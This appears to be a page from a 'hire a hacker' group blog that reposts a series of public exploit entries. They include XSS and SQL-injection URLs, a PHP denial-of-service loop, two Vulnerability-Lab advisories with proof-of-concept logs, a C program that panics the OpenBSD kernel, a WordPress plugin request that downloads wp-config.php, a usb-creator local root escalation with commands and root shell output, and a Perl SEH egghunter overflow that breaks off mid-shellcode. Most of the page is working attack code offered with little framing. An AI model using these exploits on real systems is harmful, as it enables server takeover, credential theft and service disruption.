Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863138722

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/52046/info

Tube Ace is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel=
HireHackking 
source: https://www.securityfocus.com/bid/52043/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to exhaust available memory, denying access to legitimate users.

PHP versions prior to 5.3.9 are vulnerable. 

<?php
while (true)
{
strtotime('Monday 00:00 Europe/Paris'); // Memory leak
}
?>
HireHackking 
source: https://www.securityfocus.com/bid/52053/info

CMS Faethon is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CMS Faethon 1.3.4 is vulnerable; other versions may also be affected. 

http://www.example.com/articles.php?by_author=[SQL]
http://www.example.com/article.php?id=[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/52058/info

Pandora FMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.

Pandora FMS 4.0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/[ Path ]/index.php?sec=services&sec2=[FILE INCLUDE VULNERABILITY!]
HireHackking

ButorWiki 3.0 - 'service' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52059/info ButorWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. ButorWiki 3.0.0 is vulnerable; other versions may also be affected. http://www.example.com/sso/signin?service=%22%22%3E%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
HireHackking

SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities

HACKER · %s · %s

Document Title: =============== SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1314 Release Date: ============= 2015-03-23 Vulnerability Laboratory ID (VL-ID): ==================================== 1314 Common Vulnerability Scoring System: ==================================== 5.9 Product & Service Introduction: =============================== The integrated customer management, digital customer file is the central record for a single customer. invoices, facilities and operations to a customer are stored centrally automated in one place. So the customer file is always up to date. For faster retrieval or reporting contacts can be tagged. In addition, with powerful. Search options you have as the entire customer base better than ever in view. Daily backup 256bit SSL encryption TÜV certified datacenter Free version No hidden costs No minimum contract term iPhone App Runs in any browser No installation required on the PC Easy to use Reduced to the essentials Automated, where it is only Possible (Copy of the Vendor Homepage: https://sevdesk.de/) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk v3.10 web-application & cloud online-service. Vulnerability Disclosure Timeline: ================================== 2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2014-09-02: Vendor Notification (SevDesk Developer Team) 2014-09-07: Vendor Response/Feedback (SevDesk Developer Team) 2015-02-01: Vendor Fix/Patch Notification (SevDesk Developer Team) 2015-03-23: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== SevenIT Product: SevDesk - Web Application 3.1.0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities are detected in the official SEVENIT Software GmbH - sevDesk v3.10 web-application. The vulnerability allows remote attackers or low privileged user account to inject own malicious script codes to the application-side of the vulnerable web-application module or service. The security vulnerability is located in the `firstname`, `surname` & `family` name values of the main sevDesk `Dasboard` application module. Remote attackers are able to inject own codes to the main dashboard service by manipulation of the registration username. The execution of the injected script code occurs on the application-side in the main dasboard module through the rightHead and feedcontent class. The attack vector is persistent and the request method to inject the code is POST. The victim user can also change the name by usage of the application which does not require an admins interaction on successful exploitation. The security risk of the persistent script code inject web vulnerabilities is estimated as medium with a cvss (common vulnerability scoring system) count of 5.9. Exploitation of the persistent vulnerability requires a low privileged sevdesk user account with restricted access and no direct user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Registration to SevDesk Vulnerable Parameter(s): [+] surname [+] firstname [+] family name Affected Module(s): [+] Dasboard Index - rightHead & feedcontent Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by low privileged application user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability 1. Register an account by usage of the following webpage https://my.sevdesk.de/register/ 2. Include to the surname, family name and firstname your own script code as payload 3. Save the registration form and go to the website https://my.sevdesk.de/ 4. Login with the user account data 5. The execution of the injected script code occurs after the registration POST method request and next to the redirect in the main dasboard index (rightHead < name > feedcontent) 6. Successful reproduce of the application-side security vulnerability! PoC: rightHead > Displayname (First- & Lastname) <div id="middleHead"> <input id="suche" type="text" onfocus="this.value = ''" value="Gehe zu Kontakt, Projekt, Dokument..." /> </div> <div id="rightHead"> <div style="float:right;margin-top:5px;text-align: right;padding-right:5px;"> <div style="color:#fff;padding:3px;margin-bottom:2px;"> <span style="color:#f5d385;font-weight:bold;">a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"</span></div> <a href="/admin/company">Einstellungen</a> | <a href="http://portal.sevdesk.de/" target="_blank">Hilfe</a> | <a href="./auth/logout/">Logout</a> </div> </div> </div> </div> <div id="headNav" style="top:80px;"> <div class="headwrapper"> <ul id="mainNavigation"> PoC: Verlauf > feedcontent <div> <div class="feed" id_feed="393424"><div class="imgpos"><img src="/img/icons/24x24/offer.png"></div><div class="feedbody"> <div class="headline">Samstag, 30. August 2014 - 02:14</div><div class="feedcontent"> a>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> b>"<[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]> hat den Status des <img src="/img/icons/16x16/offer.png"> <a href="/om/detail/index/id/60547">Angebots - 1007</a> auf "archiviert" geändert </div></div><div class="clearfix"></div></div> <div class="feed" id_feed="393423"><div class="imgpos"><img src="/img/icons/24x24/offer.png"/></div><div class="feedbody"> <div class="headline">Samstag, 30. August 2014 - 02:14 --- PoC Session Logs [POST] (Registration sevDesk) --- Status: 200[OK] POST https://my.sevdesk.de/register/save Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[94] Mime Type[text/html] Request Header: Host[my.sevdesk.de] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[https://my.sevdesk.de/register] Content-Length[119] Cookie[PHPSESSID=63m788aic41f173a01akttgp24; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1409658038644r0.9444753343384411; optimizelyBuckets=%7B%7D; __utma=47898149.1078820709.1409658041.1409658041.1409658041.1; __utmb=47898149.3.10.1409658041; __utmc=47898149; __utmz=47898149.1409658041.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); kvcd=1409658049586; km_ai=5La%2FUBeVvA7zRXwSTd4gSRBJccE%3D; km_uq=; km_vs=1; km_lv=1409658050; _ga=GA1.2.1078820709.1409658041] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: name[[PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE!]] surename[[PERSISTENT INJECTED SCRIPT CODE VIA SURNAME VALUE!]] familyname[[PERSISTENT INJECTED SCRIPT CODE VIA FAMILY NAME VALUE!]] username[support%40vulnerability-lab.com] password[chaos666] Response Header: Date[Tue, 02 Sep 2014 11:44:30 GMT] Server[Apache/2.2.22 (Debian)] X-Powered-By[PHP/5.4.4-14+deb7u7] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[94] Keep-Alive[timeout=5, max=99] Connection[Keep-Alive] Content-Type[text/html; charset=utf-8] Reference(s): https://my.sevdesk.de/register/save Solution - Fix & Patch: ======================= The vulnerbility can be patched by a secure parse and encode of the affected rightHead & feedcontent values in the dashboard application index. Filter and restrict the user registration input form with a secure mask or exception-handling to prevent persistent code injections in the important name values. Note: The issue has been patched by the manufacturer since 2015-02-01 Security Risk: ============== The security risk of the persistent input validation web vulnerabilities in the main dasboard application is estimated as medium. (CVSS 5.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

Mobile Drive HD 1.8 - Local File Inclusion

HACKER · %s · %s

Document Title: =============== Mobile Drive HD v1.8 - File Include Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1446 Release Date: ============= 2015-03-11 Vulnerability Laboratory ID (VL-ID): ==================================== 1446 Common Vulnerability Scoring System: ==================================== 6.4 Product & Service Introduction: =============================== Mobile Drive is the ideal app for anyone who transfer documents between PC, iPad and Cloud. Mobile Drive allows you to manage documents and organize them. You can quickly upload and download documents via email and the popular cloud storage services. (Copy of the Vendor Homepage: https://itunes.apple.com/en/app/mobile-drive-hd-document-cloud/id626102554 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the Mobile Drive HD v1.8 iOS mobile application. Vulnerability Disclosure Timeline: ================================== 2015-03-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Keke Cai Product: Mobile Drive HD- iOS Mobile Web Application 1.8 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official USB Disk Free - File Manager & Transfer v1.0 iOS mobile application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Upload Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:8080/) Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: http://localhost:8080/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png PoC: Vulnerable Source <tr class="shadow"><td><a href="/files/%3Ciframe%3E2.png" class="file">[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a></td><td class='del'> <form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png' method='post'><input name='_method' value='delete' type='hidden'/> <input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody> </table> --- PoC Session Logs [POST] --- Status: 302[Found] POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[67] Mime Type[text/html] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------21144193462 Content-Disposition: form-data; name="newfile"; filename="[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png" Content-Type: image/png - Status: 200[OK] GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2739] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[2739] Date[Mo., 09 März 2015 14:24:12 GMT] - Status: 200[OK] GET http://localhost:8080/jquery.js Load Flags[LOAD_NORMAL] Größe des Inhalts[55774] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[55774] Date[Mo., 09 März 2015 14:24:12 GMT] - Status: 200[OK] GET http://localhost:8080/files?Mon%20Mar%2009%202015%2015:26:02%20GMT+0100 Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[62] Mime Type[text/plain] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[application/json, text/javascript, */*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost:8080/] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[62] Cache-Control[private, max-age=0, must-revalidate] Content-Type[text/plain; charset=utf-8] Date[Mo., 09 März 2015 14:24:13 GMT] Reference(s): http://localhost:8080/files/ http://localhost:8080/jquery.js Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks. Encode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks. Security Risk: ============== The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.4) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)

HACKER · %s · %s

/* # Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics # Exploit Author: nitr0us # Vendor Homepage: http://www.openbsd.org # Version: 5.6 # Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386 * - 0xb16b00b5.c * * - Alejandro Hernandez (@nitr0usmx) * - Mexico 2015 * * ######################################################################### * # OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c # * ######################################################################### * * Tested under: * - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014) * - OpenBSD 5.6 i386 * - OpenBSD 5.5 i386 * * https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20 * */ #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/mman.h> #include <sys/param.h> #include <sys/types.h> #ifndef __OpenBSD__ #error "Not OpenBSD !!!1111"; #else #include <sys/exec_elf.h> #endif #ifndef __i386__ #error "Not i386 !!!1111"; #endif char big_b00bz[] = " 8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n" " 88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n" " 8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n" " 88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n" " 88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n" " 8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n" " 88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n" " 888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n" " 888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n" " 88888 M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n" " 8888 MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n" " 888 M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n" " 888 MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n" " 88 M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n" " 88 MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n" " 88 MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n" " 88 8MM::::::::::::::::::::::::::::::::::MMMMMM\n" " 8 88MM::::::::::::::::::::::M:::M::::::::MM\n" " 888MM::::::::::::::::::MM::::::MM::::::M"; int main(int argc, char **argv) { Elf32_Ehdr *hdr; Elf32_Phdr *pht; struct stat statinfo; char *elfptr; int fd; if(argc != 2) return printf("Usage: %s <elf_exec>\n", argv[0]); fd = open(argv[1], O_RDWR); fstat(fd, &statinfo); elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); hdr = (Elf32_Ehdr *) (elfptr); pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff); printf("%s", big_b00bz); pht[9].p_type = 0x7defaced; // <--- these overwrites ------------v pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343; // are necessary sleep(3 + (arc4random() % 3)); if(arc4random() % 3 == 2) puts(" .. I like b1g 0nez !!"); // 33.33% chance else { if(arc4random() % 2){ puts(" .. want s0me ?!"); pht[5].p_vaddr = 0xb16b00b5; } // .6666 * .5 = 33.33% chance else { puts(" .. j00 like it ?!"); pht[5].p_vaddr = 0x0ace55e8; }} // .6666 * .5 = 33.33% chance msync(elfptr, 0, MS_ASYNC); munmap(elfptr, statinfo.st_size); close(fd); sleep(3 + (arc4random() % 3)); system(argv[1]); // ( o )( o ) panic() puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n"); return 0xDEFECA7E; }
HireHackking

WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (2)

HACKER · %s · %s

###################### # Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download # Exploit Author : Dadou Dz # Software Link : Premium # Dork Google: inurl:com_miwoftp # Affected version: 1.0.5 # Vendor Homepage: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog # Date : 2015-04-20 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # Exploit: http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes "download_file" : wp-config.php http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes ##################### Discovered By : Dadou Dz My Email - dadoudzdz@gmail.com fb: fb.com/Dz2Team [ Thanks To ] Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team AnonGhost Team - Anonymous Dz - Backup Sec Dz Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com - dz-root.com And All My Freinds - All Muslims Hackers - All Algerian Hackers #####################
HireHackking
Source: http://www.openwall.com/lists/oss-security/2015/04/22/12 Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396 Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1) Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1) Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3) $ cat > test.c void __attribute__((constructor)) init (void) { chown("/tmp/test", 0, 0); chmod("/tmp/test", 04755); } ^D $ gcc -shared -fPIC -o /tmp/test.so test.c $ cp /bin/sh /tmp/test $ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so" method return sender=:1.4364 -> dest=:1.7427 reply_serial=2 $ ls -l /tmp/test -rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test $ /tmp/test # id euid=0(root) groups=0(root)
HireHackking
#!/usr/bin/perl ###########################################################################= ####################### # Exploit Title: Quick Search 1.1.0.189 'search textbox' Unicode SEH egghunter Buffer Overflow # Date: 2015-04-23 # Exploit Author: Tomislav Paskalev # Vulnerable Software: Quick Search v1.1.0.189 # Vendor Homepage: http://www.glarysoft.com/ # Software Link: https://www.exploit-db.com/apps/93feb6805c08d3ca84b0636a3a986a56-qsearchsetup.exe # Version: 1.1.0.189 # Tested on: Windows XP SP2 EN # OSVDB-ID: 93445 ###########################################################################= ####################### # Credits: # - Vulnerability identified by ariarat # http://www.exploit-db.com/exploits/25443/ ###########################################################################= ####################### # Exploit development notes: # - instead of attaching the process, start the executable within the debugger # - the application's module gtms_D7.bpl was not compiled with SafeSEH # - since this is a unicode buffer overflow \x00 will not terminate the string # - 6 available unicode friendly P/P/R pointers within the module # - this exploit should work across different OS versions # (tested only on Win XP SP2 EN) # - several other unicode friendly aplication modules are available, but have not been checked ###########################################################################= ####################### # How to exploit: # - Quick Search -> (click arrow for menu) Match Path -> (click arrow for menu) Full Mode ->=20 # (paste created exploit string into the search textbox) # - once the exploit string is pasted, the egghunter starts to search the memory for the marker # - on my test machine the search takes around 30 seconds (until the shellcode gets executed) # - during the search the mouse cursor will NOT have a hourglass displayed beside it # - during the search the application will NOT become unresponsive (i.e. it will be usable) ###########################################################################= ####################### # Thanks to: # - ariarat (PoC) # - Peter Van Eeckhoutte (exploit development tutorials) # - Offensive Security (IT security courses, admin support) ###########################################################################= ####################### my $junk = "A" x 21; # Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t" # msfencode -e x86/alpha_mixed # msfencode -e x86/unicode_upper BufferRegister=EAX # converted to ASCII my $egghunter = "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" . "11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" . "B9KHHHYCDO4KD1KB3QIQ9OY190IQ9PIQ9PI0IOS13PCPC1313PCOGB11J2J11R8R" . "0P01100OQRK11OQB102Q1OR02PB0BNP0BORQ11228PPP8Q1PBT50JQ9RUOF0M212" . "J1Z3IRO3F2O41QB1VP2S20J26RBP3BHRZ2MBVPNRGPLCCOESBCJ2C14482O2O18B" . "52000P02EB032PTBNBKR92J0L2OBR1E3ICJPLRO0B0URZ0G2KPO1I2W11Q1AA"; my $fill = "C" x (1045 - length($junk.$egghunter)); my $nextSEH = "\x41\x6d"; # INC ECX; INSW Yz DX my $SEH = "\x70\x34"; # POP POP RET from gtms_D7.bpl # jump to egghunter code my $allign = "\x58"; # POP EAX $allign = $allign."\x6d"; # NOP/remove NULL bytes $allign = $allign."\x58"; # POP EAX $allign = $allign."\x6d"; # NOP/remove NULL bytes $allign = $allign."\x58"; # POP EAX $allign = $allign."\x6d"; # NOP/remove NULL bytes $allign = $allign."\x05\x01\x11"; # ADD EAX, 0x11000100 $allign = $allign."\x6d"; # NOP/remove NULL bytes $allign = $allign."\x2d\x09\x11"; # SUB EAX, 0x11000900 $allign = $allign."\x6d"; # NOP/remove NULL bytes my $jumptoegghunter = "\x50"; # PUSH EAX $jumptoegghunter = $jumptoegghunter."\x6d"; # NOP/remove NULL bytes $jumptoegghunter = $jumptoegghunter."\xc3"; # RETN # fill the rest of the stack frame + padding (to avoid a memory area which coverts to upper alpha) my $fill2 = "D" x 500; # allign EAX and jump to shellcode # (this gets executed after the marker is found) my $allign2 = "\x6d"; # NOP/remove NULL bytes $allign2 = $allign2."\x57"; # PUSH EDI $allign2 = $allign2."\x6d"; # NOP/remove NULL bytes $allign2 = $allign2."\x58"; # POP EAX $allign2 = $allign2."\x6d"; # NOP/remove NULL bytes $allign2 = $allign2."\xb9\x1b\xaa"; # MOV ECX, 0xaa001b00 $allign2 = $allign2."\xe8"; # ADD AL,CH (equivalent to adding "1b" (from the previous command) # to the last two bytes of EAX; i.e. increase EAX with "1b") $allign2 = $allign2."\x6d"; # NOP/remove NULL bytes $allign2 = $allign2."\x50"; # PUSH EAX $allign2 = $allign2."\x6d"; # NOP/remove NULL bytes $allign2 = $allign2."\xc3"; # RETN # msfpayload windows/messagebox # msfencode -e x86/alpha_mixed # msfencode -e x86/unicode_upper BufferRegister=EAX # converted to ASCII my $shellcode = "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" . 